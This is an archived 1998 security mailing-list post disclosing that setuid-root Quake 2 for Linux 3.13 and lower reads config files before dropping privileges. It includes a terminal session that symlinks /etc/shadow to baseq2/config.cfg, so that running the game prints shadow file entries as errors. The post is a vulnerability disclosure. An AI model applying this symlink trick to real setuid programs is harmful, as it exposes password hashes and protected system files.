Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

From: kevingeoat_private
Date: Wed Feb 25 1998 - 02:49:58 PST

Next message: kevingeoat_private: "Quake 2 Linux 3.13 - ref_root.so still works"

Previous message: GvS One: "FreeBSD getpass "feature""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn't check the permissions before hand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x   1 root     root       303444 Feb 24 19:07
/usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]

Next message: kevingeoat_private: "Quake 2 Linux 3.13 - ref_root.so still works"
Previous message: GvS One: "FreeBSD getpass "feature""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:15 PDT